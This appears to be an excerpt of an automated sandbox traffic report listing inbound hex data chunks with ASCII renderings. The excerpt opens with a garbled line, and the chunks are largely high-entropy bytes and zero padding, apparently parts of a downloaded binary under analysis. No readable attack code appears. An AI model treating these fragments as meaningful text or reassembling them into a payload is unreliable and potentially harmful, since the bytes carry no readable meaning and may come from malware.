Iqkn{plQN]X2=].I&y!ufLH.z;ucUROs;F<(q<z{I;P=EXqKc,NuaGOL./n0Riq\aC8IR%6h8fVA4^YEDUl.ku^&)4
2021-10-16 14:53:40 UTC	6305	IN	Data Raw: da 60 77 55 29 6a 11 d0 ff e3 95 99 28 51 4b b7 c7 9d 9c a0 16 5a f9 80 3b b9 de d8 31 e9 46 14 fd 39 ed dc 9b 7b 87 22 34 3a 06 77 ba bc 25 d2 07 82 d2 d1 8d 5b 40 7b 55 d8 86 9d 93 f2 be a3 3f b1 73 09 59 d7 68 d7 4a 97 18 a8 6f f6 70 24 0e 14 84 2e ea 8b 2b 9a 9a cd 04 21 20 af c4 5c d3 3a 16 f7 64 9e 6c 06 49 ec 64 73 36 61 4e dc 51 cb 25 ab ca 44 65 15 c3 38 61 e9 d5 bb 96 b1 ec 8b 81 5e 26 ee 38 03 7b fd 3a 3b d9 6a 55 c4 40 4c 6f 60 1e 4c a6 3f db 49 b5 9f 14 22 0e 26 2f d8 b6 82 0a 62 02 f2 f9 65 fd 15 ca d2 06 0c 5c 51 e5 d9 c9 b4 d7 f5 2d af 4b e5 7b 04 b3 ef 9b 4a df 2c 01 32 97 84 a7 11 7f dc b0 e4 38 e4 11 5e c3 8e 72 4d 4f 19 57 ec 96 27 30 a9 b8 d1 41 68 0a f8 f1 3d 91 db eb 51 b7 5b 39 fd b1 94 62 18 89 c2 c5 3d 6a 4c 1f 7a e8 ce 32 20 eb Data Ascii: `wU)j(QKZ;1F9{"4:w%[@{U?sYhJop$.+! \:dlIds6aNQ%De8a^&8{:;jU@Lo`L?I"&/be\Q-K{J,28^rMOW'0Ah=Q[9b=jLz2
2021-10-16 14:53:40 UTC	6321	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6337	IN	Data Raw: 49 47 f3 40 d5 16 30 c2 d3 e9 29 fe ae c5 02 45 f3 b9 2e 0c 88 38 5d 2f 74 6f 43 0c 4d e3 56 e1 47 44 f6 d7 ab f7 ae b2 88 cd c2 7c f7 b2 81 5a 0b f8 6a 34 31 cf b1 bb 71 02 ba f0 df e2 78 9b 4c d8 d4 1b 3f 17 56 f2 b7 60 ca 91 ae 15 51 c2 c3 c9 d4 b8 f5 8d 70 72 2a ce 34 b5 c2 59 83 76 ac 92 00 36 2d de 3f 53 8d 55 fe 3f 77 31 7a 55 ea 67 b8 64 58 11 69 33 9c 80 13 28 01 c6 87 e9 4d 24 06 7e b2 9c 8f df 8e 30 c6 c2 11 1d a6 84 dc 58 78 10 83 4b 69 05 0a cd 61 1c 3d 41 a3 72 7a c5 72 68 d4 53 8d b1 d8 76 98 0b 84 70 8d e7 da 72 16 20 b3 d0 74 4c f1 b2 2b 6e 2a dd f5 9d 7e e4 81 42 ee eb 3b ce bd 00 26 00 de 6e 07 6b 98 17 61 b9 2a 19 e0 f6 14 22 d4 b5 80 5f 1e 98 15 a4 f6 66 39 8c 47 b2 fa 5b a3 5e 80 f0 85 85 72 13 fd 3d 31 0b 4f 6c 63 99 d4 54 45 55 4f Data Ascii: IG@0)E.8]/toCMVGD\|Zj41qxL?V`Qpr4Yv6-?SU?w1zUgdXi3(M$~0XxKia=ArzrhSvpr tL+n~B;&nka*"_f9G[^r=1OlcTEUO
2021-10-16 14:53:40 UTC	6353	IN	Data Raw: 8d 4a 7f 1b ed 36 d0 85 30 e2 df b6 ef c4 5f 91 2e 25 7f 5f 37 29 7b 21 50 af b0 2f ca df c2 b6 34 8b 53 0f 39 19 81 89 55 95 24 dc 9d e4 27 b5 71 39 77 a9 7e f0 37 4c 07 87 8d b2 51 e2 d1 57 62 71 26 a2 9c 28 7c 6b 9a 69 a6 f5 1d 34 b5 2d 2f df 23 4d 5a 64 35 c7 d6 6b 68 ac e0 86 f6 2a 54 58 49 96 39 21 b6 fd 96 0b d6 0d 1a 99 05 83 0b 57 0b 01 b9 c5 b7 ce 75 f1 3d 41 bb 7c 22 5f b5 7a 56 e9 53 b6 6d 2d bf 7e dd 7d c3 c0 d1 fd 6e 06 33 ae 71 9f 31 0b 8c cb e4 46 5e fe cb 76 5a 4e 74 a0 56 b9 f9 6d e8 ea 45 25 93 b5 e5 3e e2 9e f2 68 e5 91 b5 27 d3 23 5d bd 8e f7 34 20 a6 c4 5a 6e 45 a4 9d cc 88 57 5f 15 88 24 60 8b 69 45 55 f6 d4 69 58 43 50 c6 d9 e1 7d 3e d0 b4 2c 4f e5 ed 25 cd dc d1 d3 e3 92 d4 06 7b b1 23 c0 36 aa 7b f5 73 75 c6 cf 72 65 b2 05 16 5a Data Ascii: J60_.%_7){!P/4S9U$'q9w~7LQWbq&(\|ki4-/#MZd5kh*TXI9!Wu=A\|"_zVSm-~}n3q1F^vZNtVmE%>h'#]4 ZnEW_$`iEUiXCP}>,O%{#6{sureZ
2021-10-16 14:53:40 UTC	6369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 25 3d b1 91 59 3e b3 30 8a a5 1b fb 6f 20 d6 7b a2 6d 52 e9 64 ae 1f a2 52 70 4f 46 0e 6c d5 5f 9b 2e 9b a7 61 18 5a c6 85 af 77 41 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 42 4d 75 43 aa 32 a1 eb 00 4c f7 9d 9d 54 b0 e8 00 a5 c0 aa e4 9c 5e d7 a9 94 ac 44 92 a5 18 b2 82 30 e2 9f 55 0e 77 1a f5 4a f5 d1 f5 29 74 01 f8 90 6a cd c7 a8 98 99 fb 45 ba c6 63 8b cf b7 9d 42 45 76 a3 93 f3 43 da fc 23 c1 Data Ascii: %=Y>0o {mRdRpOFl_.aZwABMuC2LT^D0UwJ)tjEcBEvC#
2021-10-16 14:53:40 UTC	6385	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6401	IN	Data Raw: aa 39 20 a6 d7 74 c3 74 f3 11 7a 4b 41 e8 8c b7 71 0d c7 0f 8c d3 c3 84 a1 d6 92 a4 5b 90 7c ad b0 66 06 93 56 c8 06 b2 21 5f a7 3a f6 ee c3 8c 70 3f 8f 5f 5f e1 71 fe d7 67 1f c8 9d 4e cc f9 da 06 e7 fb 3f 74 77 76 52 19 6c 5d 2c 45 47 f1 41 0d 79 e4 2f 8d ec eb 20 84 4b f9 f5 73 2b 0f 86 0f e1 15 3c 96 84 f9 25 75 8b bf 3f 6b d6 cc e8 c5 14 b4 d4 43 54 09 0a 76 59 a8 0b c2 51 2a 3f d8 02 34 83 11 58 54 3d 3b 33 eb 23 3a 93 f6 4e 3c 7a c3 d7 37 46 6b a6 56 a3 2b cb ec 27 d8 c4 3e 44 0e 98 28 93 55 db 77 8a b2 35 38 40 e0 34 c4 69 9e 22 8c 0c ec 4e 64 e7 21 4a f3 aa 0d 2c 3b 1e 39 b6 5e de ba d3 1b 5a 66 25 e2 b8 46 88 02 8f 50 5f 9b 71 77 0f da ad ba dc cb d4 e5 6c 25 93 16 b3 9a ba f6 9f 6d fe 24 a1 a5 e7 69 b6 8d 1a 4e 2d c5 79 f1 23 43 dc 06 4f 1e ae Data Ascii: 9 ttzKAq[\|fV!_:p?__qgN?twvRl],EGAy/ Ks+<%u?kCTvYQ*?4XT=;3#:N<z7FkV+'>D(Uw58@4i"Nd!J,;9^Zf%FP_qwl%m$iN-y#CO
2021-10-16 14:53:40 UTC	6417	IN	Data Raw: f6 3c 9d 91 1d 1c 40 bf 9a 50 0a cd 41 20 aa 83 d8 0e 67 9a 32 a6 0f 97 ac 63 9d 34 d5 9c 34 f3 d3 1f 11 91 1b 44 69 f2 b7 2c 0a e7 ff 54 06 00 2f 9c ac af 7d 94 0d f4 7f 6a 5b ec cb b9 1e 05 b0 ba fc 40 5f c9 b2 d9 8f 63 c4 cf ac a7 46 ce d0 55 ba 12 1d 66 96 23 e3 d3 64 c3 55 41 ac d1 f0 6f 78 28 7d b0 8a c1 e6 49 45 10 d7 a2 a4 cb 71 12 f7 28 26 c8 12 ef 6d c9 dc b2 0b 29 0b 11 20 37 49 3b 53 8d d5 bf 85 8f 9c a7 42 0f e6 85 3d dd dc 93 c0 2d 9f 8d c8 de f8 df a0 71 16 94 35 65 9a 9f 8b d5 fe d8 aa a3 2a 33 44 56 b0 95 f8 fa 7c 19 8f c5 7f 83 6e d5 02 8f f9 f0 41 01 1a 82 3f fe a7 36 98 c8 4f 83 d7 7a b7 b1 1a 68 d5 c1 54 06 f1 19 5c e8 ef 39 f0 d8 87 e8 08 b5 d7 fa 9a cb 50 55 21 3c 90 e2 01 2c da 4a 18 c3 30 c6 72 21 32 a7 51 38 50 78 f5 72 55 09 13 Data Ascii: <@PA g2c44Di,T/}j[@_cFUf#dUAox(}IEq(&m) 7I;SB=-q5e*3DV\|nA?6OzhT\9PU!<,J0r!2Q8PxrU
2021-10-16 14:53:40 UTC	6433	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6449	IN	Data Raw: af 11 f8 b6 16 bd 37 8b bb bd a9 db 0f 99 0c 96 f3 64 19 56 a6 39 41 6d 78 d4 73 34 77 be 6c 14 5f 2f 5b 93 31 07 e2 38 6c a9 01 55 04 4c d9 1c 56 ba e0 0c 53 7e 3f 52 1c f8 20 8e 00 3a 7c 9b 7a 66 0f b6 58 ac 6d 04 d2 c6 fc 33 5c 93 57 4e 5e b1 dd fb f8 9b 20 d0 f2 bf 49 70 5c 9f e8 0a 52 60 f0 f1 99 74 0b 00 85 77 c8 0f 03 02 fc 4e 82 fd 64 e5 ce 00 d5 52 bf 31 5e 1a b4 d5 99 2c 5e c5 5c d8 e3 75 9e 06 0f 89 71 49 bd 11 6a 43 0d b2 f1 f4 9f 0c 75 19 02 76 d0 b3 6e 9b 9b 3d 0f 6c 32 2b a8 39 09 a7 5c b2 a7 8b ab 8d 5a da 20 c6 f7 38 12 59 55 a8 ee 0b 43 0c 30 39 59 09 9f cf 7d 5f 51 bc b2 1c ae 8f bd 6d 55 f6 c7 17 04 8d 0d 9f fe 1c ec 22 2e 59 cc 64 82 ca 8a d8 f6 6f a7 ad 27 bd 58 b5 ca 58 4e 66 8b 1d a9 db f2 20 39 60 f7 42 d0 3e ed 21 82 37 d7 fc f0 Data Ascii: 7dV9Amxs4wl_/[18lULVS~?R :\|zfXm3\WN^ Ip\R`twNdR1^,^\uqIjCuvn=l2+9\Z 8YUC09Y}_QmU".Ydo'XXNf 9`B>!7
2021-10-16 14:53:40 UTC	6465	IN	Data Raw: 72 8b b9 e8 3f 78 91 2d 17 2b e5 fa 81 89 32 50 f7 c3 7e 32 a5 77 4b b6 19 75 ee 4e 5b 09 a3 cf 4b 22 e1 59 97 22 4f c7 8f 1b 30 9c 83 d0 de b4 66 6c a7 cd c6 9f ae d7 60 fe 33 17 84 e0 b8 0b 4b 55 a6 8a d8 14 10 4d 52 d1 87 21 c2 d9 f0 a6 70 e2 5b 81 2e e9 da f8 8a e0 b1 5e 72 a7 c1 2d af 1b 01 e5 2e c0 a7 f6 75 30 81 1f b9 b2 41 53 05 61 49 7a 86 0b 9f ae 2f fb a2 57 e1 8b c2 43 32 f1 1c b1 42 a4 9e 4a 4e 70 15 4c 41 9b 60 02 af 1f 71 fd 13 27 56 75 7b 6f df 62 a5 8c 66 dd b5 fe a6 5c 1b d6 18 06 31 40 dd b0 2f 56 81 5e 33 7b df c5 06 f8 60 34 fc 76 7f 4d a8 45 f2 45 0e f6 16 dd ea f4 b4 53 ec c0 42 ff 1d b0 1f 8e 6f 3a 6a 01 61 35 49 be 96 fa e5 61 6a 1d bf b1 c1 61 6c 27 20 fc b6 20 43 65 95 33 c0 fb 14 d3 67 5d a3 c0 1b 2e c3 8e 7e df 6b 07 37 28 98 Data Ascii: r?x-+2P~2wKuN[K"Y"O0fl`3KUMR!p[.^r-.u0ASaIz/WC2BJNpLA`q'Vu{obf\1@/V^3{`4vMEESBo:ja5Iajal' Ce3g].~k7(
2021-10-16 14:53:40 UTC	6481	IN	Data Raw: 73 dc 84 25 ba af 06 c4 9c 37 6d f6 3c 4b 5a 1b f7 f0 d6 d2 4e ff 8e d5 9b 42 2c c5 11 65 dc 67 ae d5 22 63 f1 2e 6a 23 0d 49 bc a0 c2 12 1f 57 e9 ce c4 ca ad 67 c2 6b d5 32 40 e3 09 76 fe 64 9c 1b 06 e7 4e 03 eb c1 bc 3c 4e e0 7d f5 36 ef 30 8b b2 c8 7c 00 55 f3 bf 5f da 92 d5 7e 50 f7 02 0c 9c 13 19 e7 32 66 b6 a7 2b f7 52 5b 1d ee d8 c4 88 50 ab 14 cf 13 90 20 83 b2 66 b7 34 a6 72 d6 ef b4 b3 f9 2d da 32 12 11 c2 ca c1 2c b4 00 0c 72 5a f9 d3 cf 2f 12 36 3e a6 d3 d8 fd 57 5c 28 cb 14 82 e6 46 6f 9f ef 8e 4a b3 05 a1 17 42 b4 85 fd 86 d8 f2 cd 38 62 30 b5 86 e2 34 33 91 22 c6 52 77 33 7f dc f8 35 9d 48 30 7c bb c5 d9 16 b1 92 51 e0 5d dc 70 e4 5b 14 03 40 60 9b ff 24 ad 7f 9f 72 d3 2e 26 06 3e db 17 7d 56 74 46 da da 40 18 2e d1 b7 b3 19 89 51 b6 67 ec Data Ascii: s%7m<KZNB,eg"c.j#IWgk2@vdN<N}60\|U_~P2f+R[P f4r-2,rZ/6>W\(FoJB8b043"Rw35H0\|Q]p[@`$r.&>}VtF@.Qg
2021-10-16 14:53:40 UTC	6497	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6513	IN	Data Raw: d2 44 c2 60 57 af f9 36 14 db c9 dc f8 cc df d5 b8 c6 47 0a 0d 14 9f 87 e1 da 3e ec 83 3b da 2d 58 49 b0 54 56 65 68 fd 4e d6 4b 00 88 53 cb 8e 10 4e f0 d3 fb 35 35 d8 0f 36 4a 98 ed 34 dc 7a 57 ee ec a3 67 94 61 e0 a7 c3 27 e9 92 7b 5e b8 94 20 ec 7f eb ff 75 52 41 b2 59 bc 34 29 03 14 71 23 0d cf 3c 21 00 c4 1c 7e 8f 95 3e ef 6d ee d1 cb c7 db 4e 39 f2 02 52 ab 7e 33 48 1b e9 ef a3 2c b1 73 d0 b9 65 44 bc 32 56 12 26 0e a4 0c 23 40 ed a4 3f 2b a6 d9 80 76 b9 88 6f 7a 1c ad b4 d8 da f9 ff 03 c6 d8 52 be 71 09 1d bf 92 cd 1d e6 6e a9 33 f5 31 36 2a e8 f1 af 22 28 94 f4 79 df 28 5b c9 2b 2f 1d 83 8f 0a 2f d8 7e 34 f1 eb 7e 1e b7 92 71 a0 fa 30 27 5c 0f 06 3b f9 8c 2f 72 a1 34 5a 1f eb c4 74 1a af 54 aa 12 09 61 71 3c 68 54 2f f4 44 be a7 13 07 af 19 d1 54 Data Ascii: D`W6G>;-XITVehNKSN556J4zWga'{^ uRAY4)q#<!~>mN9R~3H,seD2V&#@?+vozRqn316*"(y([+//~4~q0'\;/r4ZtTaq<hT/DT
2021-10-16 14:53:40 UTC	6529	IN	Data Raw: 0e 55 ef d5 26 c9 7e 02 46 b5 91 27 1f c1 4f ab 24 d7 5f 59 53 4f 9a fa d8 62 a8 48 e8 c3 e5 ca e7 4c 17 c5 7a 72 09 b7 94 85 1e ec f5 65 c0 82 1a 4a 45 a3 ab de b2 23 5f 89 f8 60 40 8d 14 e1 81 73 31 b7 5c 87 0e 7c 34 bc eb a6 14 5a 3c 53 d7 24 e4 6f f4 fa cc 27 fd af 88 be 87 9d e3 d9 a5 9f 7c 03 87 27 84 8a 90 95 72 58 df de 08 a8 b2 96 d2 eb 26 49 81 af f0 10 6b 2d d4 5d 65 9b 5a 7f 75 3f 51 38 76 21 8a 69 2b 2d 7f b3 8d 05 bc 97 66 ed ac dd 21 19 69 fc 18 14 97 7f cf ef a2 8f ad 73 d9 06 36 b5 b8 a8 02 bb d8 55 34 12 c1 89 80 de c6 43 aa 64 e3 8e 89 ec e6 41 81 84 e0 23 1e 77 36 04 c1 ce c2 34 47 c3 3c a9 9a 35 f3 2f f0 ad d3 39 25 36 93 8d 3e f4 31 8c 71 bd a6 03 f9 8b 1e e3 2f 44 5f fc 8b ea dc 6a d2 97 62 e3 84 d1 c2 34 7d 35 f1 e0 56 96 fb 33 6f Data Ascii: U&~F'O$_YSObHLzreJE#_`@s1\\|4Z<S$o'\|'rX&Ik-]eZu?Q8v!i+-f!is6U4CdA#w64G<5/9%6>1q/D_jb4}5V3o
2021-10-16 14:53:40 UTC	6545	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6561	IN	Data Raw: 47 77 52 6c 08 a4 af 39 2e 3a e6 bf b0 62 9b 8c ca 58 48 d7 1f 9e af e8 6b ab 06 fb dd 3c 74 13 bb fb d6 94 fe d0 99 b3 45 81 6a 04 c0 cc 7e 00 21 ac e8 32 e0 60 5e b4 4f 3d eb 48 10 21 53 b7 91 aa 0d 0f 00 00 00 00 37 92 4d 4e 26 52 41 a8 07 d2 29 ca 68 ce de 67 7d 86 6e e7 09 89 55 40 88 d7 08 10 6c 97 9c 6b 57 97 7e 5c 9a ee db da ce 70 0a 53 21 ef b4 a0 72 ab 3a 1b 8e 47 91 18 4d c6 2b f0 35 e8 6d f8 1d 10 59 bd 95 a8 85 3b f1 3d 5e 2c 7e 17 88 d7 b2 06 0c 58 56 94 e0 97 a3 6a f3 96 3c 2f d8 6a a7 09 da 53 7f 13 46 bc 3e a8 2f da 31 a3 6f aa a5 cd e9 3c 35 63 a3 81 76 7e 1f 49 f6 16 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c Data Ascii: GwRl9.:bXHk<tEj~!2`^O=H!S7MN&RA)hg}nU@lkW~\pS!r:GM+5mY;=^,~XVj</jSF>/1o<5cv~I@QSystem.Drawing, Version=4.0.0.0,
2021-10-16 14:53:40 UTC	6577	IN	Data Raw: f1 4f 3a a8 d6 34 c9 39 66 aa e9 04 88 9e 0f 11 8c df 17 34 3a e2 d3 4f e4 ad 5d f2 0a c3 2c 35 81 c4 fb 5a 25 aa 70 ca 87 38 61 f0 3a 27 03 c6 7b 18 e0 7f 79 0c 76 10 6d a6 7a a2 22 c5 a3 63 4e 15 12 01 4f 55 3f aa 00 ee c6 98 b9 34 a6 9a 96 f0 c3 7f 68 d3 09 86 70 4f 7a 3a 1a 9e 1e 67 85 ff a5 41 f3 93 04 76 58 77 14 f2 9d b4 68 fb 85 4a fb f5 15 5d 8c da 8d 5f 77 e8 58 2c 08 dc 73 3a c1 61 4d e3 f7 fc 75 f0 3f f3 c8 ae b6 ca d7 c2 b1 dd 60 92 68 86 8e 5d 01 53 c1 b4 22 a1 d8 01 49 af 9e 06 7b bb b2 37 46 97 6b 43 f9 1b 66 09 a0 14 e2 93 7a fb 3e eb a1 e6 96 57 dc 5d 35 89 2e f9 fb 98 56 ee e4 86 f8 35 f0 a5 89 66 e5 ff 0b 63 1a 0e 4c ec e1 78 aa 11 d4 ec ba f1 9b 55 bd 5c 8e 2c 98 ce ee 67 99 2f 08 74 e8 5b a0 9e 89 2f 99 36 d8 94 de 5f 8e bf 0b d7 d4 Data Ascii: O:49f4:O],5Z%p8a:'{yvmz"cNOU?4hpOz:gAvXwhJ]_wX,s:aMu?`h]S"I{7FkCfz>W]5.V5fcLxU\,g/t[/6_
2021-10-16 14:53:40 UTC	6593	IN	Data Raw: dc f7 4e bf 92 d1 ee a9 ca 35 17 ff bd 7f 29 72 b1 82 54 0a 32 dc cb 63 cf 62 72 56 7e b4 e9 44 fd 83 9a 7e 19 7d 9e 08 63 0b 33 ff dc 74 67 4f 5e df 3c 89 65 4b 94 8c 77 6a d3 a3 10 52 4c 64 27 8e f5 ee ad bf 54 de 0d 0d bf 76 3f 64 de 86 a5 7e 59 c5 79 63 d0 fa fc 7a 21 f7 4f 83 73 7d 87 40 ad f4 d7 f6 46 b8 6d a3 6d cc 4f 7d f1 12 bc d5 c2 43 e2 d3 5c 72 7a 60 07 d2 66 e0 86 d6 d5 2d 30 1f aa 58 86 6c 17 76 aa 64 d8 45 a4 3b dc 68 b6 96 0e a5 d3 53 7a fd 7c b2 ca ec ff 27 7b ee b6 c1 da 67 22 c2 63 5b 01 36 e1 2c b9 25 6e 85 55 d8 d2 31 11 b5 21 cd 63 a0 58 13 8b ed 72 95 3c 10 9f dc 83 37 79 d6 90 e7 91 87 cf 2c e0 78 2e ca 18 90 51 33 5a 4a 33 f6 83 aa 4a 1a 40 09 59 25 ef dc f1 ac 3c 62 96 0e d3 6e 8d 0f 22 9b 43 a5 88 f3 22 e7 30 a3 3a 37 a8 85 cf Data Ascii: N5)rT2cbrV~D~}c3tgO^<eKwjRLd'Tv?d~Yycz!Os}@FmmO}C\rz`f-0XlvdE;hSz\|'{g"c[6,%nU1!cXr<7y,x.Q3ZJ3J@Y%<bn"C"0:7
2021-10-16 14:53:40 UTC	6609	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6625	IN	Data Raw: 62 bb dd ee b6 fa df 19 64 a2 e7 5e 15 45 3b 58 71 6f 51 8a f2 f4 16 09 3c a5 da 30 a3 9a 32 1f d6 7a 0f d1 58 c3 0e 22 76 98 c6 6d f0 2f 46 41 56 07 10 9f 8b d0 3b 41 bb 48 04 41 fc 56 4d 7d 96 f9 8f 46 ed c6 22 3a c9 9c 66 c0 b8 26 83 f1 90 97 18 3f d2 b4 fd 21 b3 d5 1b bf d2 d5 8c d0 f4 b2 3d 9e 18 97 7c 33 40 97 d8 5b 29 2d d6 20 c3 99 63 6d 73 19 01 b7 46 70 82 26 5c a1 87 db 75 6d 3d ed 7c 81 5d b0 e4 af ea ca 15 a2 83 f2 df 54 38 4e 3e 75 70 77 ab 5f 32 a2 48 ce c1 3e 32 4c aa e7 22 0b 12 0d 09 ec 6b e9 13 8b 15 c3 c5 46 4e 20 88 10 2a 35 de 8c 3c 80 16 bd 2a c8 71 91 58 76 39 c1 5d f8 b7 db ca 5e 37 fb 54 1d 42 59 10 3c a9 85 08 c1 8d e1 40 35 f1 af 9b 8c d4 59 3c 4e 67 91 cc f7 f6 dc 93 c4 be 1d 76 12 d4 c2 38 02 8d ab d9 90 d3 28 82 4b 30 ce de Data Ascii: bd^E;XqoQ<02zX"vm/FAV;AHAVM}F":f&?!=\|3@[)- cmsFp&\um=\|]T8N>upw_2H>2L"kFN 5<qXv9]^7TBY<@5Y<Ngv8(K0
